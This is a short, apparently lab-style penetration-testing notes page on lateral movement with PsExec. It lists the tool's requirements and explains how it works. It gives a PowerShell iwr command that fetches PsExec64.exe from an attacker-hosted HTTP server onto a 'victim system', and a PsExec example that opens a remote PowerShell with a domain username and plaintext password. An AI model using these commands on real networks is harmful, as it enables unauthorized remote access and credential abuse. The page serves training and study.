search

PSexec Tool

hashtag
PsExec Tool

Requirements to Run this Successfully are as follows:

  1. The user must have an Administrator local group member.

  2. ADMIN$ share must be available.

  3. File and Printer sharing must be on.

Working:

  1. Writes psexesvc.exe into the C:\Windows directory

  2. Creates and spawns a service on the remote host

  3. Runs the requested program/command as a child process of psexesvc.exe

hashtag
Type 1: RDP Access is there

# Assuming that we have RDP access to the machine
# First need to download the tool from the website.
https://learn.microsoft.com/en-us/sysinternals/downloads/psexec

# send the file to the victim system and run the below command.
# Extract and start the server.
iwr -uri http://192.168.45.152:8000/PsExec64.exe -Outfile PsExec64.exe

# Run file
.\PsExec64.exe -i \\<Target_Hostname> -u <Domain>\<Username> -p <Password> <Process>

# Example:
# .\PsExec64.exe -i \\FILES04 -u corp\jen -p Nexus123! powershell
 
# .\PsExec64.exe: The PsExec executable.
# -i: Runs the process interactively.
# \\<Target_Hostname>: The remote machine (e.g., \\FILES04).
# -u <Domain>\<Username>: Specifies the user (corp\jen).
# -p <Password>: The user's password (Nexus123!).
# <Process>: The process to execute (e.g., powershell).

hashtag
Type 2: We don't have RDP access. (Using kali)

Initial Check for Access!!!

In the output, if you see '(Pwn3d!)', it indicates that you have local admin privileges for that machine and can attempt to log in using impacket-psexec.

PreviousUse of WMI and WinRM and Evil-WinRMNextPass the Hash

Last updated